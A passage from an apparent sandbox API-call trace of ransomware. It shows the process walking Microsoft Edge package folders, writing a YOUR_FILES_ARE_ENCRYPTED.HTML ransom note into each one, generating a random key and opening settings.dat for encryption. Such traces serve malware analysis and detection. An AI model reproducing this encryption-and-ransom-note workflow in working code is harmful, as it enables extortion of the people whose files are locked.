"c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\microsoft.microsoftedge_25.10586.0.0_neutral__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.428] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.429] CloseHandle (hObject=0x32c) returned 1 [0116.429] GetProcessHeap () returned 0x600000 [0116.429] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.429] GetProcessHeap () returned 0x600000 [0116.429] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.429] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x888ab4e8, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x888d1750, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x888d1750, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0116.429] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.429] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 176 [0116.429] GetProcessHeap () returned 0x600000 [0116.429] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\microsoft.microsoftedge_25.10586.0.0_neutral__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.431] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.432] CloseHandle (hObject=0x214) returned 1 [0116.432] GetProcessHeap () returned 0x600000 [0116.432] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.432] GetProcessHeap () returned 0x600000 [0116.432] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.432] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87fe09a0, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x87fe09a0, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x87fe09a0, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0116.432] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.432] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\RoamingState") returned 99 [0116.432] GetProcessHeap () returned 0x600000 [0116.432] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.432] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\RoamingState" [0116.432] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\RoamingState\\*" [0116.432] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87fe09a0, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x87fe09a0, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x87fe09a0, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0116.432] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87fe09a0, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x87fe09a0, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x87fe09a0, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="..", cAlternateFileName="")) returned 1 [0116.432] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87fe09a0, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x87fe09a0, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x87fe09a0, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="..", cAlternateFileName="")) returned 0 [0116.433] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0116.433] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0116.433] GetProcessHeap () returned 0x600000 [0116.433] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.433] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.433] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.434] CloseHandle (hObject=0x214) returned 1 [0116.434] GetProcessHeap () returned 0x600000 [0116.434] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.434] GetProcessHeap () returned 0x600000 [0116.434] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.434] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88006be9, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88006be9, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88006be9, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0116.435] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.435] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings") returned 95 [0116.435] GetProcessHeap () returned 0x600000 [0116.435] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.435] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings" [0116.435] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\*" [0116.435] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88006be9, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88006be9, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9259b185, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.437] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88006be9, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88006be9, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9259b185, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="..", cAlternateFileName="")) returned 1 [0116.437] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8802cde8, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8802cde8, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8802cde8, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0116.437] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.437] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 108 [0116.437] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0116.437] lstrlenW (lpString=".lock") returned 5 [0116.437] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0116.437] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88006be9, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x70956fc, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x70956fc, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0116.437] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.437] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\settings.dat") returned 108 [0116.437] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0116.437] lstrlenW (lpString=".dat") returned 4 [0116.437] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0116.437] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0116.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0116.437] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0116.438] GetProcessHeap () returned 0x600000 [0116.438] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0116.439] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="4F") returned 2 [0116.439] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="B7") returned 2 [0116.439] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="5F") returned 2 [0116.439] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="D5") returned 2 [0116.439] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="B9") returned 2 [0116.439] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="F9") returned 2 [0116.439] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="2C") returned 2 [0116.439] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="55") returned 2 [0116.439] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="D1") returned 2 [0116.439] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="67") returned 2 [0116.439] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="BE") returned 2 [0116.439] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="04") returned 2 [0116.439] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="16") returned 2 [0116.439] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="EF") returned 2 [0116.439] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="B9") returned 2 [0116.439] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="5E") returned 2 [0116.439] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="A6") returned 2 [0116.439] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="91") returned 2 [0116.439] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="E4") returned 2 [0116.439] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="3D") returned 2 [0116.439] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="5E") returned 2 [0116.439] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="77") returned 2 [0116.439] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="07") returned 2 [0116.439] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="CA") returned 2 [0116.439] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="61") returned 2 [0116.439] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="0D") returned 2 [0116.440] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="D2") returned 2 [0116.440] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="6D") returned 2 [0116.440] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="E5") returned 2 [0116.440] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="00") returned 2 [0116.440] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="A9") returned 2 [0116.440] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="6D") returned 2 [0116.440] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\settings.dat" [0116.440] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0116.440] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0116.440] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9259b185, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9259b185, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9259b185, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0116.440] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.440] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1") returned 113 [0116.440] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0116.440] lstrlenW (lpString=".LOG1") returned 5 [0116.440] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0116.440] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9259b185, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9259b185, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9259b185, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0116.440] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.440] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2") returned 113 [0116.440] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0116.441] lstrlenW (lpString=".LOG2") returned 5 [0116.441] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0116.441] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9259b185, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9259b185, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9259b185, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0116.441] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.441] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0116.441] GetProcessHeap () returned 0x600000 [0116.441] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.441] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.442] CloseHandle (hObject=0x214) returned 1 [0116.442] GetProcessHeap () returned 0x600000 [0116.442] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.442] GetProcessHeap () returned 0x600000 [0116.442] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.442] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88006be9, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88006be9, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88006be9, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0116.442] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.442] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\SystemAppData") returned 100 [0116.443] GetProcessHeap () returned 0x600000 [0116.443] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.443] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\SystemAppData" [0116.443] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\SystemAppData\\*" [0116.443] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88006be9, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88006be9, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88006be9, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.443] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, 